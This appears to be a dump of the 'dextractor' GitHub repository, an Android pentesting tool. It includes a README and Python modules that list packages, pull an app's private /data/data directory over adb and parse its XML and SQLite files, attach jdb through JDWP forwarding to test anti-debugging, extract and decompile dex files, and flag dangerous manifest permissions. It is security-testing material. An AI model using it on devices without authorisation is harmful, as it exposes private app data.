permissions.check_permissions(arg)\n\n def do_exit(self, arg):\n print(\"See you soon!\")\n return True\n\n\n\n # HELPs\n def help_cwd(self):\n print(\"Set the current working directory\")\n print(\"cwd /path/to/dir\\n\")\n\n def help_dextract(self):\n print(\"Type: dextract file.apk\")\n\n def help_devices(self):\n print(\"List all devices.\")\n\n def help_dump(self):\n print(\"Dump app data.\")\n print(\"Usage: dump package destination\")\n \n def help_connect(self):\n print(\"Connect to an android device. If only one device is connected, just type connect.\")\n print(\"Usage: connect <devices output>.\")\n\n def help_packages(self):\n print(\"List all the installed apps.\")\n print(\"Usage: packages <name filter>.\")\n\n def help_debug(self):\n print(\"Test debug with jdwp\")\n print(\"Usage: debug com.package.name\")\n\n def help_perm(self):\n print(\"Prints AndroidManifest.xml dangerous permissions\")\n print(\"Usage: perm AndroidManifest.xml\")\n \n def help_exit(self):\n print('exit the application. Shorthand: x q Ctrl-D.')\n \n def default(self, inp):\n if inp == 'x' or inp == 'q':\n return self.do_exit(inp)\n \n print(\"Type ? or help to list commands.\")\n \n\n\ndef parse_arg(arg):\n try:\n return tuple(arg.split())\n except ValueError:\n return arg\n\ndef pull(package, dest):\n try:\n # Directory pull to be implemented in ppadb, using standalone binary\n # output = self.device.pull(\"/data/data/%s %s\" % (package, dest))\n try:\n cmd = ['adb', 'pull', \"/data/data/%s\" % package, dest]\n adb = subprocess.Popen(cmd)\n adb.wait()\n except:\n print(\"[-] Error while dumping app data.\")\n\n filelist = dumper.fast_scandir(dest)\n dumper.dump(filelist,'xml',dest)\n dumper.dump(filelist,'sqlite',dest)\n dumper.dump(filelist,'json',dest)\n\n except FileNotFoundError as e:\n print(e)\n \n \nif __name__ == '__main__':\n Dextractor().cmdloop()\n" }, { "alpha_fraction": 0.6898102164268494, "alphanum_fraction": 0.7147852182388306, "avg_line_length": 26.054054260253906, "blob_id": "f2192bfce8a50dc4b6af3ea386beb20406c9b447", "content_id": "b7e8c514d8fdd1ac8cec656b3fcb60e68191cfbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2002, "license_type": "permissive", "max_line_length": 291, "num_lines": 74, "path": "/README.md", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "# dextractor\nAndroid pentesting with ease.\n\n## Description\nThe tools allows to connect through adb to an Android device. Once connected, use the **packages** command to list the installed apps, use **dump** command to save locally the app data files (/data/data/app_package) and dump all xml and sqlite3 content into txt files for further inspection.\nIt allows to connect quickly through jdb and test if anti-debug is in place.\nIt also checks for dangerous permissions in AndroidManifest.xml\n\n```\nandrea@MBP-di-Andrea dextractor % dextractor\n\n64 65 78 74 72 61 63 74 6F 72\nAndyCyberSec 2020 - www.andreabruschi.net\nType ? or help to list commands\ndextractor % perm ./AndroidManifest.xml\n\n[+] Requesting https://developer.android.com/reference/android/Manifest.permission...\n\n[+] Found 4 dangerous permissions in AndroidManifest.xml\n\nDangerous: android.permission.RECORD_AUDIO\n\nDangerous: android.permission.CAMERA\n\nDangerous: android.permission.WRITE_EXTERNAL_STORAGE\n\nDangerous: android.permission.ACCESS_FINE_LOCATION\n```\n\n### Prerequisites\n* dex2jar\n* adb\n\n## Installation\n\n```\npip3 install -r requirements.txt \n```\n\n### Note\nThe tool will use pure-python-adb but actually it doesn't support pull of directories. For this functionality the script now uses adb binary.\n\n## Commands\n```\nDocumented commands (type help <topic>):\n========================================\nconnect cwd debug devices dextract dump exit help packages perm\n```\n\n## Usage\nYou can create a symlink into your /usr/local/bin\n\n```\nln -s /path/dextractor/main.py /usr/local/bin/dextractor\n```\n\n```\n$ dextractor\n\n64 65 78 74 72 61 63 74 6F 72\nAndyCyberSec 2020 - www.andreabruschi.net\nType ? or help to list commands\ndextractor % help\n\nDocumented commands (type help <topic>):\n========================================\nconnect cwd debug devices dextract dump exit help packages perm\n\ndextractor % \n```\n\n## Authors\n\n* **Andrea Bruschi** - *Initial work* - [AndyCyberSec](https://github.com/AndyCyberSec)\n" }, { "alpha_fraction": 0.6313337087631226, "alphanum_fraction": 0.6330809593200684, "avg_line_length": 25.384614944458008, "blob_id": "e1a7d5a9a7d277b8e52b0e38352bb40e1e70086e", "content_id": "7fc3b1f0d044e462b4d0f46892537e15a0dbcf19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1717, "license_type": "permissive", "max_line_length": 104, "num_lines": 65, "path": "/permissions.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef compare_permissions(dangerous_permissions, permissions):\n\n result = []\n \n for perm in permissions:\n for att in perm.attrib:\n permission_manifest = perm.attrib[att]\n\n for dangerous_permission in dangerous_permissions:\n\n if dangerous_permission in permission_manifest:\n\n result.append(\"Dangerous:\\t{}\\n\".format(permission_manifest))\n \n return result\n\n\ndef check_permissions(manifest):\n\n try:\n root = ET.parse(manifest).getroot()\n permissions = root.findall(\"uses-permission\")\n dangerous_permissions = make_request()\n\n compare_result = compare_permissions(dangerous_permissions, permissions)\n\n print(\"[+] Found {} dangerous permissions in AndroidManifest.xml\\n\".format(len(compare_result)))\n\n for element in compare_result:\n print(element)\n\n except FileNotFoundError:\n print('[-] Manifest file not found.')\n \n \n\ndef make_request():\n\n url = \"https://developer.android.com/reference/android/Manifest.permission\"\n\n print(\"\\n[+] Requesting {}...\\n\".format(url))\n\n res = requests.get(url)\n html = res.text\n\n soup = BeautifulSoup(html,'html.parser')\n\n permissions = []\n\n # perm_filter = ('normal', 'signature', 'dangerous')\n\n for element in soup.find_all('div', {\"data-version-added\" : True}):\n permission = element.h3.get(\"id\")\n\n if \"Protection level:\" in element.p.text:\n prot_level = element.p.text.split(\"level:\")[1]\n\n if \"dangerous\" in prot_level:\n permissions.append(permission)\n \n return permissions\n\n\n" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 20.25, "blob_id": "43397d678ea277e509b5d2395068391d330d842b", "content_id": "443bedb7364ca277b9d6392918453285e01ce511", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 255, "license_type": "permissive", "max_line_length": 63, "num_lines": 12, "path": "/debugger.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "import subprocess\n\n\ndef debug(pid):\n\n cmd = ['adb', \"forward\", \"tcp:1234\", \"jdwp:{}\".format(pid)]\n stream = subprocess.Popen(cmd)\n stream.wait()\n\n jdb = [\"jdb\", \"-attach\", \"localhost:1234\"]\n stream = subprocess.Popen(jdb)\n stream.wait()\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 17.33333396911621, "blob_id": "f4fd7195b9f0da2e23b42218f1bfac736e673a9c", "content_id": "2b339bc936d63fe4f018351c93121dc0f6271d29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 54, "license_type": "permissive", "max_line_length": 26, "num_lines": 3, "path": "/requirements.txt", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "pure-python-adb=0.2.5.dev0\nfiletype=1.0.7\nPTable=0.9.2" }, { "alpha_fraction": 0.5299281477928162, "alphanum_fraction": 0.535514771938324, "avg_line_length": 26.2391300201416, "blob_id": "29f926a6cf39b7e4e4ba18f8e51d074a3ef78d63", "content_id": "b17301545e86c85375eec0f2ba94a659f45f2f1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1253, "license_type": "permissive", "max_line_length": 85, "num_lines": 46, "path": "/dextractor.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "#AndyCyberSec 2020 - https://github.com/AndyCyberSec\n\nfrom zipfile import ZipFile\nimport sys\nimport os\nimport subprocess\n\ndef banner():\n\n print(\"\"\"Usage: dextractor.py file.apk\"\"\")\n\ndef dextract(apk):\n\n dest_path = os.path.dirname(apk)\n\n if len(dest_path) == 0:\n dest_path = \".\"\n\n dexs = []\n file_found = False\n\n try:\n with ZipFile(apk, 'r') as zip:\n for element in zip.infolist():\n if \".dex\" in element.filename:\n try:\n zip.extract(element, dest_path)\n print(\"[+] Extraction of \" + element.filename + \" complete!\")\n dexs.append(dest_path + \"/\" + element.filename) \n file_found = True\n except:\n print(\"[-] Error during extraction of \" + element.filename)\n except FileNotFoundError:\n print(\"[-] %s not found :\\'( \\n\" % apk)\n \n if file_found:\n dextojar(dexs, dest_path)\n\ndef dextojar(dexs, dest_path):\n\n print(\"[+] Now decompiling dex files...\\n\")\n\n cmd = ['/usr/local/bin/d2j-dex2jar', \",\".join(dexs)]\n stream = subprocess.Popen(cmd, cwd=dest_path)\n stream.wait()\n print(\"[+] Decompiling complete!\\n\")\n" } ]
7